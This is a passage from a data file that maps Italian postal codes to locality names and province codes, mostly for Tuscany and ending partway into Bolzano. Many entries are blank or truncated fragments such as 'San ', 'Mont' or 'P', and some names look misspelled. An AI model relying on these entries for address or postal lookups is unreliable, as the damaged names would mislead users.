["Diacceto", "FI"], ], "50061": [["Compiobbi", "FI"]], "50062": [["Sandetole", "FI"], ["Dicomano", "FI"]], "50063": [["Figline E Inc", "FI"], ["Figline Valdarno", "FI"]], "50064": [["Incisa In Val D'Arno", "FI"], ["Loppiano", "FI"]], "50065": [ ["Pontassieve", "FI"], ["Montebonello", "FI"], ["", "FI"], ["Santa Brigida", "FI"], ["Sieci", "FI"], ], "50066": [ ["Tosi", "FI"], ["Cancelli", "FI"], ["Cascia", "FI"], ["Sant'Ellero", "FI"], ["Pietrapiana", "FI"], ["Donnini", "FI"], ["Reggello", "FI"], ["Saltino", "FI"], ["Matassino", "FI"], ["Vaggio", "FI"], ["Leccio", "FI"], ["", "FI"], ["Vallombrosa", "FI"], ["San ", "FI"], ], "50067": [["Troghi", "FI"], ["San Donato In Collina", "FI"], ["", "FI"], ["Rosano", "FI"]], "50068": [["Pomino", "FI"], ["Rufina", "FI"], ["Contea", "FI"]], "50100": [["Firenze", "FI"]], "50121": [["Firenze", "FI"]], "50122": [["Firenze", "FI"]], "50123": [["Firenze", "FI"]], "50124": [["Firenze", "FI"], ["Galluzzo", "FI"]], "50125": [["Arcetri", "FI"], ["P", "FI"], ["San Felice A Ema", "FI"], ["Firenze", "FI"]], "50126": [ ["Firenze", "FI"], ["Ponte A Ema", "FI"], ["Sorgane", "FI"], ["Bandino", "FI"], ["Pieve A Ripoli", "FI"], ["Badia A Ripoli", "FI"], ], "50127": [["Firenze", "FI"], ["Novoli", "FI"]], "50129": [["Firenze", "FI"]], "50131": [["Firenze", "FI"]], "50132": [["Firenze", "FI"]], "50133": [["Firenze", "FI"]], "50134": [["Firenze", "FI"], ["Careggi", "FI"]], "50135": [["Montalbano", "FI"], ["Settignano", "FI"], ["Coverciano", "FI"], ["Firenze", "FI"]], "50136": [["Firenze", "FI"], ["Rovezzano", "FI"], ["Varlungo", "FI"]], "50137": [["Firenze", "FI"]], "50139": [["Firenze", "FI"]], "50141": [["Firenze", "FI"], ["Castello", "FI"], ["Rifredi", "FI"]], "50142": [["Mantignano", "FI"], ["Isolotto", "FI"], ["Firenze", "FI"]], "50143": [["Firenze", "FI"]], "50144": [["Firenze", "FI"]], "50145": [["Firenze", "FI"], ["Brozzi", "FI"], ["Peretola", "FI"]], "58010": [ ["San Quirico", "GR"], ["Montebuono", "GR"], ["San Valentino", "GR"], ["Sorano", "GR"], ["Pratolungo", "GR"], ["Elmo", "GR"], ["Castell'Ottieri", "GR"], ["Montorio", "GR"], ["Sovana", "GR"], ["Albinia", "GR"], ["Montevitozzo", "GR"], ["", "GR"], ], "58011": [["", "GR"], ["", "GR"], ["Chiarone", "GR"], ["Capalbio", "GR"]], "58012": [ ["", "GR"], ["", "GR"], ["", "GR"], ["Campese", "GR"], ["", "GR"], ], "58014": [ ["", "GR"], ["", "GR"], ["", "GR"], ["Marsiliana", "GR"], ["San Martino Sul Fiora", "GR"], ["Saturnia", "GR"], ["Manciano", "GR"], ["Montemerano", "GR"], ], "58015": [ ["Polverosa", "GR"], ["Fonteblanda", "GR"], ["Orbetello", "GR"], ["Santa Liberata", "GR"], ["Orbetello Scalo", "GR"], ["Talamone", "GR"], ["Orbetello Stazione", "GR"], ], "58017": [["Il Casone", "GR"], ["Casone", "GR"], ["Pitigliano", "GR"]], "58018": [["Porto Ercole", "GR"]], "58019": [["", "GR"], ["Mont", "GR"], ["Giannutri", "GR"]], "58020": [["Puntone", "GR"], ["Scarlino Stazione", "GR"], ["Scarlino Scalo", "GR"], ["Scarlino", "GR"]], "58022": [["", "GR"], ["Follonica", "GR"]], "58023": [ ["", "GR"], ["Miniera", "GR"], ["", "GR"], ["", "GR"], ["Potassa", "GR"], ["Caldana", "GR"], ["Ravi", "GR"], ["Giuncarico", "GR"], ["Grilli", "GR"], ["Gavorrano", "GR"], ["Boschetto", "GR"], ["Filare", "GR"], ], "58024": [ ["Montebamboli", "GR"], ["", "GR"], ["Prata", "GR"], ["Niccioleta", "GR"], ["Capanne", "GR"], ["", "GR"], ["Tatti", "GR"], ["Ghirlanda", "GR"], ["Valpiana", "GR"], ], "58025": [["", "GR"], ["", "GR"], ["Frassine", "GR"]], "58026": [["Travale", "GR"], ["Montieri", "GR"], ["Boccheggiano", "GR"], ["Gerfalco", "GR"]], "58027": [["Ribolla", "GR"], ["Montemassi", "GR"]], "58031": [ ["Bagnoli", "GR"], ["Arcidosso", "GR"], ["Salaiola", "GR"], ["Montelaterone", "GR"], ["Zancona", "GR"], ["Stribugliano", "GR"], ], "58033": [["Montegiovi", "GR"], ["", "GR"], ["Montenero", "GR"]], "58034": [["Castell'Azzara", "GR"], ["Selvena", "GR"]], "58036": [ ["", "GR"], ["Sassofortino", "GR"], ["Sticciano", "GR"], ["Roccatederighi", "GR"], ["Roccastrada", "GR"], ["Torniella", "GR"], ["", "GR"], ], "58037": [["Bagnolo", "GR"], ["Selva", "GR"], ["", "GR"], ["Marroneto", "GR"], ["Bagnore", "GR"]], "58038": [["Seggiano", "GR"]], "58042": [["Montorsaio", "GR"], ["Campagnatico", "GR"], ["Arcille", "GR"], ["Arcille Di Campagnatico", "GR"]], "58043": [ ["Buriano", "GR"], ["Vetulonia", "GR"], ["", "GR"], ["Tirli", "GR"], ["", "GR"], ["", "GR"], ], "58044": [ ["", "GR"], ["Cinigiano", "GR"], ["", "GR"], ["'Amiata", "GR"], ["", "GR"], ], "58045": [ ["Stazione Di Monte Antico", "GR"], ["Monte Antico Scalo", "GR"], ["Monte Antico", "GR"], ["Paganico", "GR"], ["Civitella Paganico", "GR"], ["Casale Di Pari", "GR"], ["Pari", "GR"], ["C", "GR"], ], "58051": [["Magcana", "GR"], ["Pereta", "GR"], ["Montiano", "GR"]], "58053": [ ["Cana", "GR"], ["Vallerona", "GR"], ["Roccalbegna", "GR"], ["Santa Caterina", "GR"], ["Triana", "GR"], ], "58054": [ ["Murci", "GR"], ["Pomonte", "GR"], ["Pancole", "GR"], ["Scansano", "GR"], ["Montorgiali", "GR"], ["", "GR"], ["Baccinello", "GR"], ["Polveraia", "GR"], ["Preselle", "GR"], ["Poggioferro", "GR"], ], "58055": [["Semproniano", "GR"], ["Petricci", "GR"], ["Catabbio", "GR"], ["Cellena", "GR"]], "58100": [ ["", "GR"], ["", "GR"], ["Rispescia", "GR"], ["Batignano", "GR"], ["Le Stiacciole", "GR"], ["Braccagni", "GR"], ["Montepescali Stazione", "GR"], ["", "GR"], ["", "GR"], ["Alberese", "GR"], ["Montepescali", "GR"], ["Grosseto", "GR"], ["", "GR"], ], "57014": [ ["Vicarello", "LI"], ["", "LI"], ["Castell'Anselmo", "LI"], ["Crocino", "LI"], ["", "LI"], ["Collesalvetti", "LI"], ["Colognole", "LI"], ["", "LI"], ], "57016": [ ["", "LI"], ["Nibbiaia", "LI"], ["", "LI"], ["Castiglioncello", "LI"], ["", "LI"], ["Gabbro", "LI"], ["Vada", "LI"], ["", "LI"], ], "57017": [["Stagno", "LI"], ["", "LI"], ["Nugola", "LI"], ["Guasticce", "LI"]], "57020": [["Sassetta", "LI"], ["La California", "LI"], ["Bibbona", "LI"]], "57021": [ ["Stazione Di Campiglia Marittima", "LI"], ["Campiglia Marittima Stazione", "LI"], ["", "LI"], ["Venturina", "LI"], ], "57022": [ ["Donoratico", "LI"], ["", "LI"], ["", "LI"], ["", "LI"], ["", "LI"], ["Bolgheri", "LI"], ], "57023": [["San Pietro In Palazzi", "LI"], ["Cecina", "LI"], ["", "LI"]], "57025": [ ["Piombino", "LI"], ["", "LI"], ["Colmata", "LI"], ["Portovecchio", "LI"], ["", "LI"], ["Riotorto", "LI"], ["Populonia", "LI"], ["Cotone", "LI"], ["", "LI"], ], "57027": [["", "LI"], ["", "LI"]], "57028": [["Montioni", "LI"], ["Suvereto", "LI"]], "57030": [["Procchio", "LI"], ["Poggio", "LI"], ["Marciana", "LI"], ["Pomonte", "LI"]], "57031": [["Capoliveri", "LI"]], "57032": [["", "LI"]], "57033": [["", "LI"]], "57034": [ ["", "LI"], ["Cavoli", "LI"], ["", "LI"], ["Pianosa", "LI"], ["", "LI"], ["Seccheto", "LI"], ["Sant'Ilario", "LI"], ["", "LI"], ["La Pila", "LI"], ], "57036": [["", "LI"]], "57037": [["Portoferraio", "LI"], ["Magazzini", "LI"], ["Carpani", "LI"], ["", "LI"]], "57038": [["", "LI"], ["Cavo", "LI"]], "57039": [["", "LI"]], "57100": [["Livorno", "LI"]], "57121": [["Livorno", "LI"]], "57122": [["Livorno", "LI"]], "57123": [["Livorno", "LI"]], "57124": [["Livorno", "LI"], ["Salviano", "LI"], ["", "LI"]], "57125": [["Livorno", "LI"]], "57126": [["Livorno", "LI"]], "57127": [["Livorno", "LI"]], "57128": [["Antignano", "LI"], ["Livorno", "LI"], ["Montenero", "LI"], ["Ardenza", "LI"]], "55010": [["", "LU"], ["Gragnano", "LU"], ["San Gennaro", "LU"], ["Lappato", "LU"]], "55011": [["Marginone", "LU"], ["Altopascio", "LU"], ["", "LU"], ["Spianate", "LU"]], "55012": [["Capannori", "LU"], ["Zone", "LU"], ["Lunata", "LU"], ["", "LU"]], "55013": [["Lammari", "LU"]], "55014": [["Marlia", "LU"]], "55015": [ ["San Salvatore", "LU"], ["San Salvatore Di Montecarlo", "LU"], ["Montecarlo", "LU"], ["Turchetto", "LU"], ], "55016": [["Porcari", "LU"]], "55018": [ ["Segromigno In Piano", "LU"], ["San Colombano", "LU"], ["Matraia", "LU"], ["Segromigno In Monte", "LU"], ], "55019": [["Pracando", "LU"], ["Botticino", "LU"], ["Villa Basilica", "LU"]], "55020": [ ["Fosciandora", "LU"], ["San Pellegrinetto", "LU"], ["Fornovolasco", "LU"], ["Vergemoli", "LU"], ["Sassi", "LU"], ["Molazzana", "LU"], ], "55021": [["", "LU"], ["", "LU"]], "55022": [ ["", "LU"], ["", "LU"], ["", "LU"], ["Scesta", "LU"], ["", "LU"], ["Montefegatesi", "LU"], ["", "LU"], ["", "LU"], ["Benabbio", "LU"], ["", "LU"], ["Lucchio", "LU"], ["Casabasciana", "LU"], ["Fornoli", "LU"], ["Isola", "LU"], ], "55023": [ ["Gioviano", "LU"], ["Diecimo", "LU"], ["Chifenti", "LU"], ["Anchiano", "LU"], ["Corsagna", "LU"], ["", "LU"], ["Valdottavo", "LU"], ], "55025": [ ["Tereglio", "LU"], ["Ghivizzano", "LU"], ["Calavorno", "LU"], ["", "LU"], ["", "LU"], ], "55027": [["Gallicano", "LU"], ["Fiattone", "LU"], ["Turritecava", "LU"], ["Trassilico", "LU"]], "55030": [ ["", "LU"], ["", "LU"], ["Careggine", "LU"], ["Corfino", "LU"], ["", "LU"], ["Magliano", "LU"], ], "55031": [["Poggio", "LU"], ["", "LU"], ["Camporgiano", "LU"], ["Filicaia", "LU"]], "55032": [["Palleroso", "LU"], ["", "LU"]], "55033": [ ["Chiozza", "LU"], ["", "LU"], ["Valbona", "LU"], ["Cerageto", "LU"], ["", "LU"], ], "55034": [ ["Gramolazzo", "LU"], ["Minucciano", "LU"], ["Gorfigliano", "LU"], ["Carpinelli", "LU"], ["", "LU"], ["", "LU"], ], "55035": [["Sant'Anastasio", "LU"], ["", "LU"], ["", "LU"]], "55036": [["", "LU"]], "55038": [["arfagnana", "LU"]], "55039": [["Giuncugnano", "LU"], ["", "LU"], ["Sillano", "LU"]], "55040": [["Stazzema", "LU"], ["Ruosina", "LU"], ["Pontestazzemese", "LU"], ["Terrinca", "LU"]], "55041": [ ["Nocchi", "LU"], ["Pieve", "LU"], ["Camaiore", "LU"], ["Vado", "LU"], ["Valpromaro", "LU"], ["", "LU"], ["", "LU"], ["Montebello", "LU"], ["Pedona", "LU"], ["Montemagno", "LU"], ["Casoli", "LU"], ], "55042": [["", "LU"]], "55045": [ ["Fiumetto", "LU"], ["Pietrasanta", "LU"], ["Focette", "LU"], ["", "LU"], ["Capriglia", "LU"], ["", "LU"], ["Crociale", "LU"], ["", "LU"], ["Capezzano", "LU"], ["Vallecchia", "LU"], ["Strettoia", "LU"], ["Tonfano", "LU"], ], "55047": [ ["Pozzi", "LU"], ["Riomagno", "LU"], ["Querceta", "LU"], ["Seravezza", "LU"], ["Ripa", "LU"], ["Ponterosso", "LU"], ["Basati", "LU"], ["Azzano", "LU"], ], "55049": [["Viareggio", "LU"], ["", "LU"]], "55051": [ ["Filecchio", "LU"], ["Sommocolonia", "LU"], ["", "LU"], ["Barga", "LU"], ["", "LU"], ["", "LU"], ["Tiglio", "LU"], ["Mologno", "LU"], ["Sommacolonia", "LU"], ], "55054": [ ["", "LU"], ["Corsanico", "LU"], ["Bozzano", "LU"], ["Quiesa", "LU"], ["", "LU"], ["Stiava", "LU"], ["Massarosa", "LU"], ["", "LU"], ["Gualdo", "LU"], ], "55060": [ ["Palagnana", "LU"], ["Guamo", "LU"], ["Vorno", "LU"], ["", "LU"], ["", "LU"], ], "55061": [["Carraia", "LU"], ["", "LU"]], "55062": [["Ruota", "LU"], ["", "LU"], ["", "LU"]], "55064": [ ["Pascoso", "LU"], ["", "LU"], [" In Freddana", "LU"], ["Loppeglia", "LU"], ["", "LU"], ["Piegaio", "LU"], ["San Rocco In Turrite", "LU"], ["Pescaglia", "LU"], ], "55100": [ ["", "LU"], ["Lucca", "LU"], ["Cerasomma", "LU"], ["", "LU"], ["", "LU"], ["Pontetetto", "LU"], ["", "LU"], ["Piaggione", "LU"], ["Saltocchio", "LU"], ["Nozzano", "LU"], ["", "LU"], ["", "LU"], ["Fagnano", "LU"], ["Montuolo", "LU"], ["Maggiano", "LU"], ["", "LU"], ["Picciorana", "LU"], ["Vinchiana", "LU"], ["Mutigliano", "LU"], ["Gattaiola", "LU"], ["", "LU"], ["", "LU"], ], "54010": [["Montedivalli", "MS"], ["Podenzana", "MS"]], "54011": [ ["Quercia", "MS"], ["Pallerone", "MS"], ["Bigliolo", "MS"], ["Caprigliola", "MS"], ["Aulla", "MS"], ["Bibola", "MS"], ["Serricciolo", "MS"], ["", "MS"], ], "54012": [["Barbarasco", "MS"], ["Tresana", "MS"], ["", "MS"]], "54013": [ ["Campiglione", "MS"], ["Sassalbo", "MS"], ["Tenerano", "MS"], ["Soliera", "MS"], ["Moncigoli", "MS"], ["Vinca", "MS"], ["Fivizzano", "MS"], ["", "MS"], ["Agnino", "MS"], ["", "MS"], ["Gragnola", "MS"], ["Gassano", "MS"], ["Colla", "MS"], ["Rometta", "MS"], ["Ceserano", "MS"], ["Monzone", "MS"], ["", "MS"], ], "54014": [ ["Regnano", "MS"], ["Codiponte", "MS"], ["", "MS"], ["Equi", "MS"], ["", "MS"], ], "54015": [["Comano", "MS"], ["Crespiano", "MS"]], "54016": [ ["", "MS"], ["", "MS"], ["Tavernelle", "MS"], ["Monti", "MS"], ["Terrarossa", "MS"], ], "54021": [["Treschietto", "MS"], ["Gabbiana", "MS"], ["Bagnone", "MS"], ["Corlaga", "MS"]], "54023": [["Filattiera", "MS"], ["Cantiere", "MS"], ["Ponticello", "MS"], ["Scorcetoli", "MS"]], "54026": [ ["", "MS"], ["Montereggio", "MS"], ["Groppoli", "MS"], ["Arpiola", "MS"], ["Mulazzo", "MS"], ], "54027": [ ["Traverde", "MS"], ["Molinello", "MS"], ["Pontremoli", "MS"], ["Grondola", "MS"], ["Guinadi", "MS"], ["Cervara", "MS"], ["Vignola", "MS"], ], "54028": [["Filetto", "MS"], ["Villafranca In Lunigiana", "MS"], ["Virgoletta", "MS"], ["Merizzo", "MS"]], "54029": [["Zeri", "MS"], ["", "MS"]], "54033": [ ["Castelpoggio", "MS"], ["Fossone", "MS"], ["Fossola", "MS"], ["", "MS"], ["Avenza", "MS"], ["Codena", "MS"], ["Gragnana", "MS"], ["Sorgnano", "MS"], ["Carrara", "MS"], ["Torano", "MS"], ["Bergiola", "MS"], ["Fontia", "MS"], ["Miseglia", "MS"], ["Bedizzano", "MS"], ["Colonnata", "MS"], ], "54035": [ ["Tendola", "MS"], ["Fosdinovo", "MS"], ["Caniparola", "MS"], ["Borghetto", "MS"], ["Melara", "MS"], ["Marciaso", "MS"], ], "54038": [ ["", "MS"], ["Cerreto", "MS"], ["", "MS"], ["Cinquale", "MS"], ["Montignoso", "MS"], ], "54100": [ ["Turano", "MS"], ["Ronchi", "MS"], ["Forno", "MS"], ["Casette", "MS"], ["Mirteto", "MS"], ["Canevara", "MS"], ["Altagnana", "MS"], ["Massa", "MS"], ["Quercioli", "MS"], ["", "MS"], ], "56010": [ ["", "PI"], ["", "PI"], ["Campo", "PI"], ["Caprona", "PI"], ["Cucigliana", "PI"], ["", "PI"], ["Mezzana", "PI"], ["Vicopisano", "PI"], ], "56011": [["Gabella", "PI"], ["Castelmaggiore", "PI"], ["Calci", "PI"], ["Montemagno", "PI"]], "56012": [["Calcinaia", "PI"], ["Fornacette", "PI"]], "56017": [ ["Gello", "PI"], ["Ripafratta", "PI"], ["Agnano", "PI"], ["", "PI"], ["Pontasserchio", "PI"], ["Arena", "PI"], ["", "PI"], ["Rigoli", "PI"], ["Ghezzano", "PI"], ["Asciano", "PI"], ["Pappiana", "PI"], ], "56019": [["Vecchiano", "PI"], ["Avane", "PI"], ["Filettole", "PI"], ["Migliarino", "PI"], ["Nodica", "PI"]], "56020": [ ["Cerretti", "PI"], ["Montecalvoli", "PI"], ["", "PI"], ["", "PI"], ["Montopoli", "PI"], ["'Arno", "PI"], ["Marti", "PI"], ["", "PI"], ["Capanne", "PI"], ], "56021": [ ["Cascina", "PI"], ["", "PI"], ["Marciana", "PI"], ["", "PI"], ["", "PI"], ["San ", "PI"], ["Latignano", "PI"], ], "56022": [["", "PI"], ["", "PI"], ["Orentano", "PI"]], "56023": [ ["Navacchio", "PI"], ["", "PI"], ["Montione", "PI"], ["Musigliano", "PI"], ["Ripoli", "PI"], ], "56024": [["Corazzano", "PI"], ["La Serra", "PI"], ["", "PI"]], "56025": [ ["Montecastello", "PI"], ["Pontedera", "PI"], ["La Borra", "PI"], ["Il Romito", "PI"], ["Treggiaia", "PI"], ["La Rotta", "PI"], ["", "PI"], ], "56028": [ ["Isola", "PI"], ["", "PI"], ["San Mini", "PI"], ["San Miniato", "PI"], ["P", "PI"], ], "56029": [["Staffoli", "PI"], ["", "PI"]], "56030": [ ["Selvatelle", "PI"], ["Orciatico", "PI"], ["Soiana", "PI"], ["Terricciola", "PI"], ["Morrona", "PI"], ["Lajatico", "PI"], ], "56031": [["Bientina", "PI"], ["", "PI"]], "56032": [["La Croce", "PI"], ["Buti", "PI"], ["Cascine", "PI"]], "56033": [["San Pietro Belvedere", "PI"], ["Capannoli", "PI"]], "56034": [["Rivalto", "PI"], ["", "PI"], ["Chianni", "PI"]], "56035": [ ["Usigliano", "PI"], ["Cevoli", "PI"], ["Lavaiano", "PI"], ["", "PI"], ["Perignano", "PI"], ["", "PI"], ["", "PI"], ["Lari", "PI"], ["Spinelli", "PI"], ], "56036": [ ["Montefoscoli", "PI"], ["Palaia", "PI"], ["", "PI"], ["Alica", "PI"], ["Forcoli", "PI"], ["Partino", "PI"], ], "56037": [ ["Fabbrica", "PI"], ["", "PI"], ["", "PI"], ["Ghizzano", "PI"], ["Peccioli", "PI"], ["Legoli", "PI"], ], "56038": [["Giardino", "PI"], ["Ponsacco", "PI"]], "56040": [ ["", "PI"], ["Guardistallo", "PI"], ["", "PI"], ["Montescudaio", "PI"], ["", "PI"], ["Cenaia", "PI"], ["", "PI"], ["Sassa", "PI"], ["", "PI"], ["", "PI"], ["", "PI"], ["Canneto", "PI"], ["", "PI"], ["Ponteginori", "PI"], ["", "PI"], ["Crespina", "PI"], ["", "PI"], ["Pastina", "PI"], ["Pomaia", "PI"], ["", "PI"], ], "56041": [["", "PI"], ["", "PI"], ["", "PI"]], "56042": [["", "PI"], ["Lorenzana", "PI"]], "56043": [["Luciana", "PI"], ["Fauglia", "PI"]], "56044": [["Lustignano", "PI"], ["Larderello", "PI"], ["Serrazzano", "PI"], ["Montecerboli", "PI"]], "56045": [ ["", "PI"], ["Montegemoli", "PI"], ["Micciano", "PI"], ["Libbiano", "PI"], ["Pomarance", "PI"], ], "56046": [["Riparbella", "PI"]], "56048": [ ["Volterra", "PI"], ["Pignano", "PI"], ["Mazzolla", "PI"], ["Villamagna", "PI"], ["Ulignano", "PI"], ["", "PI"], ["Saline", "PI"], ], "56100": [["Pisa", "PI"]], "56121": [["Putignano", "PI"], ["Pisa", "PI"], ["Riglione", "PI"], ["Coltano", "PI"]], "56122": [["", "PI"], ["Pisa", "PI"]], "56123": [["Pisa", "PI"]], "56124": [["Pisa", "PI"]], "56125": [["Pisa", "PI"]], "56126": [["Pisa", "PI"]], "56127": [["Pisa", "PI"]], "56128": [["Pisa", "PI"]], "59011": [["Seano", "PO"], ["Bacchereto", "PO"]], "59013": [["Fornacelle", "PO"], ["Montemurlo", "PO"], ["Oste", "PO"]], "59015": [ ["", "PO"], ["Artimino", "PO"], ["", "PO"], ["Carmignano", "PO"], ["Comeana", "PO"], ], "59016": [["", "PO"], ["Poggetto", "PO"]], "59021": [["", "PO"], ["Vaiano", "PO"], ["Schignano", "PO"]], "59024": [ ["", "PO"], ["Mercatale", "PO"], ["Cavarzano", "PO"], ["", "PO"], ["San Quirico", "PO"], ["Vernio", "PO"], ], "59025": [ ["", "PO"], ["Cantagallo", "PO"], ["Carmignanello", "PO"], ["Usella", "PO"], ["Luicciana", "PO"], ], "59026": [["Montepiano", "PO"]], "59100": [ ["Cafaggio", "PO"], ["Galciana", "PO"], ["", "PO"], ["", "PO"], ["Mezzana", "PO"], ["Narnali", "PO"], ["Santa Maria A Colonica", "PO"], ["Iolo", "PO"], ["Viaccia", "PO"], ["San Giorgio A Colonica", "PO"], ["Paperino", "PO"], ["Prato", "PO"], ["Maliseti", "PO"], ["Coiano", "PO"], ["", "PO"], ["Tavola", "PO"], ], "51010": [ ["Traversagna", "PT"], ["Marliana", "PT"], ["Montagnana", "PT"], ["Santa Lucia Uzzanese", "PT"], ["Forone", "PT"], ["Avaglio", "PT"], ["", "PT"], ["", "PT"], ["", "PT"], ["Uzzano", "PT"], ["", "PT"], ["Momigno", "PT"], ["", "PT"], ], "51011": [["Buggiano", "PT"], ["", "PT"]], "51012": [["Veneri", "PT"], ["", "PT"], ["", "PT"], ["Collodi", "PT"]], "51013": [["", "PT"], ["Chiesanuova", "PT"], ["Chiesanuova Uzzanese", "PT"]], "51015": [ ["Cintolese", "PT"], ["Montevettolini", "PT"], ["Pozzarello", "PT"], ["", "PT"], ["", "PT"], ["Uggia", "PT"], ["Pazzera", "PT"], ], "51016": [ ["Nievole", "PT"], ["", "PT"], ["", "PT"], ["", "PT"], ], "51017": [ ["", "PT"], ["Pietrabuona", "PT"], ["Pescia", "PT"], ["Castelvecchio", "PT"], ["Vellano", "PT"], ["", "PT"], ["", "PT"], ["Pontito", "PT"], ], "51018": [["", "PT"]], "51019": [["", "PT"], ["Anchione", "PT"]], "51020": [ ["Castello", "PT"], ["Prunetta", "PT"], ["Popiglio", "PT"], ["Calamecca", "PT"], ["Pavana", "PT"], ["", "PT"], ["Treppio", "PT"], ["", "PT"], ["", "PT"], ["Prataccio", "PT"], ["Torri", "PT"], ["Collina", "PT"], ["Crespole", "PT"], ["Frassignoni", "PT"], ["Piteglio", "PT"], ["", "PT"], ["", "PT"], ], "51021": [["Abetone", "PT"], ["Le Regine", "PT"]], "51024": [["Pianosinatico", "PT"], ["", "PT"], ["Cutigliano", "PT"]], "51028": [ ["", "PT"], ["Pontepetri", "PT"], ["Gavinana", "PT"], ["", "PT"], ["Bardalone", "PT"], ["", "PT"], ["Mammiano", "PT"], ["Maresca", "PT"], ["", "PT"], ["Limestre", "PT"], ], "51030": [["", "PT"]], "51031": [["", "PT"], ["Agliana", "PT"], ["", "PT"]], "51034": [ ["", "PT"], ["", "PT"], ["", "PT"], ["Casalguidi", "PT"], ], "51035": [ ["", "PT"], ["Lamporecchio", "PT"], ["Porciano", "PT"], ["Mastromarco", "PT"], ["Orbignano", "PT"], ], "51036": [["", "PT"], ["Larciano", "PT"], ["Castelmartini", "PT"]], "51037": [ ["", "PT"], ["Fognano", "PT"], ["Montale", "PT"], ["", "PT"], ["Tobbiana", "PT"], ], "51039": [ ["Catena", "PT"], ["Olmi", "PT"], ["Santonuovo", "PT"], ["Quarrata", "PT"], ["Montemagno", "PT"], ["Ferruccia", "PT"], ["Tizzana", "PT"], ["", "PT"], ], "51100": [ ["Candeglia", "PT"], ["Capostrada", "PT"], ["Saturnana", "PT"], ["Ponzano", "PT"], ["Orsigna", "PT"], ["Pontelungo", "PT"], ["Piazza", "PT"], ["", "PT"], ["Piastre", "PT"], ["Masiano", "PT"], ["Chiazzano", "PT"], ["", "PT"], ["Valdibrana", "PT"], ["Grazie", "PT"], ["Piteccio", "PT"], ["Pistoia", "PT"], ["", "PT"], ["", "PT"], ["Pracchia", "PT"], ["Corbezzi", "PT"], ["Bottegone", "PT"], ["Cireglio", "PT"], ["Sammomme'", "PT"], ["Santomato", "PT"], ], "53011": [["Fonterutoli", "SI"], ["Castellina In Chianti", "SI"]], "53012": [["Chiusdino", "SI"], ["Ciciano", "SI"], ["Frosini", "SI"], ["Montalcinello", "SI"]], "53013": [ ["Lecchi", "SI"], ["Nusenna", "SI"], ["Castagnoli", "SI"], ["Monti", "SI"], ["Ama", "SI"], ["", "SI"], ], "53014": [ ["", "SI"], ["", "SI"], ["", "SI"], ["Corsano", "SI"], ["", "SI"], ["", "SI"], ], "53015": [ ["Iesa", "SI"], ["", "SI"], ["Monticiano", "SI"], ["Scalvaia", "SI"], ["Tocchi", "SI"], ], "53016": [["Casciano", "SI"], ["Murlo", "SI"], ["Vescovado", "SI"]], "53017": [["Lucarelli", "SI"], ["", "SI"]], "53018": [["Rosia", "SI"], ["Sovicille", "SI"], ["", "SI"]], "53019": [ ["Vagliagli", "SI"], ["Casetta", "SI"], ["Quercegrossa", "SI"], ["", "SI"], ["", "SI"], ["Pianella", "SI"], ["Monteaperti", "SI"], ["'", "SI"], ], "53020": [ ["Montisi", "SI"], ["Trequanda", "SI"], ["Castelmuzio", "SI"], ["Petroio", "SI"], ["", "SI"], ], "53021": [["", "SI"]], "53022": [["Buonconvento", "SI"]], "53023": [ ["", "SI"], ["Gallina", "SI"], ["", "SI"], ["", "SI"], ["", "SI"], ["", "SI"], ], "53024": [ ["Montalcino", "SI"], ["", "SI"], ["", "SI"], ["Torrenieri", "SI"], ["", "SI"], ], "53025": [["Saragiolo", "SI"], ["Piancastagnaio", "SI"]], "53026": [["Monticchiello", "SI"], ["Pienza", "SI"]], "53027": [["", "SI"], ["", "SI"]], "53030": [ ["Belforte", "SI"], ["Anqua", "SI"], ["", "SI"], ["", "SI"], ["Radicondoli", "SI"], ], "53031": [["Monteguidi", "SI"], ["Pievescola", "SI"], ["", "SI"]], "53034": [ ["Quartaia", "SI"], ["", "SI"], ["", "SI"], ["Campiglia", "SI"], ], "53035": [ ["", "SI"], ["", "SI"], ["Uopini", "SI"], ["Monteriggioni", "SI"], ["Belverde", "SI"], ["Castellina In Chianti Stazione", "SI"], ["Badesse", "SI"], ["Strove", "SI"], ["Tognazza", "SI"], ], "53036": [["Poggibonsi", "SI"], ["Bellavista", "SI"], ["Staggia", "SI"]], "53037": [["Ulignano", "SI"], ["", "SI"], ["San Gimignano", "SI"]], "53040": [ ["", "SI"], ["Contignano", "SI"], ["Radicofani", "SI"], ["Cetona", "SI"], ["", "SI"], ["", "SI"], ["Palazzone", "SI"], ["", "SI"], ["Piazze", "SI"], ], "53041": [ ["Chiusure", "SI"], ["Arbia", "SI"], ["Asciano", "SI"], ["Mont", "SI"], ["", "SI"], ], "53042": [["", "SI"]], "53043": [["Chiusi Stazione", "SI"], ["Chiusi", "SI"], ["Montallese", "SI"], ["Chiusi Scalo", "SI"]], "53045": [ ["Mont", "SI"], ["Abbadia", "SI"], ["Valiano", "SI"], ["Acquaviva", "SI"], ["", "SI"], ["Gracciano", "SI"], ["Montepulciano", "SI"], ["Sant'Albino", "SI"], ], "53047": [["Sarteano", "SI"]], "53048": [ ["Rigomagno", "SI"], ["Guazzino", "SI"], ["", "SI"], ["Rigaiolo", "SI"], ["Bettolle", "SI"], ["Sinalunga", "SI"], ["Scrofiano", "SI"], ], "53049": [["Montefollonico", "SI"], ["Torrita Stazione", "SI"], ["Torrita Di Siena", "SI"]], "53100": [ ["Costalpino", "SI"], ["", "SI"], ["Siena", "SI"], ["", "SI"], ["Coroncina", "SI"], ["", "SI"], ["Malafrasca", "SI"], ["", "SI"], ], "39010": [ ["Grissian", "BZ"], ["Saltusio", "BZ"], ["Tisens", "BZ"], ["Tesimo", "BZ"], [".", "BZ"], ["Sinich", "BZ"], ["Nals", "BZ"], ["Pawigl", "BZ"], ["Nalles", "BZ"], ["Sigmundskron", "BZ"], ["Gfrill", "BZ"], ["Platzers", "BZ"], ["St. Nikolaus/Ulten", "BZ"], ["Vilpian", "BZ"], ["Vernue", "BZ"], ["Gfeis", "BZ"], ["Schlaneid", "BZ"], ["Pfelders", "BZ"], ["Saltaus", "BZ"], ["Verschneid", "BZ"], ["Kuens", "BZ"], ["", "BZ"], ["", "BZ"], ["Riffian", "BZ"], ["Caines", "BZ"], ["", "BZ"], ["", "BZ"], ["", "BZ"], ["Cermes", "BZ"], ["Senale San Felice", "BZ"], ["San Martino In Passiria", "BZ"], ["Andrian", "BZ"], ["", "BZ"], ["Frangart", "BZ"], ["Prissia", "BZ"], ["", "BZ"], ["Mölten", "BZ"], ["", "BZ"], ["", "BZ"], ["Meltina", "BZ"], ["Vöran", "BZ"], ["Hafling", "BZ"], ["Tscherms", "BZ"], ["Avelengo", "BZ"], ["Senale", "BZ"], ["Sant'Orsola In Passiria", "BZ"], ["Rifiano", "BZ"], ["Andriano", 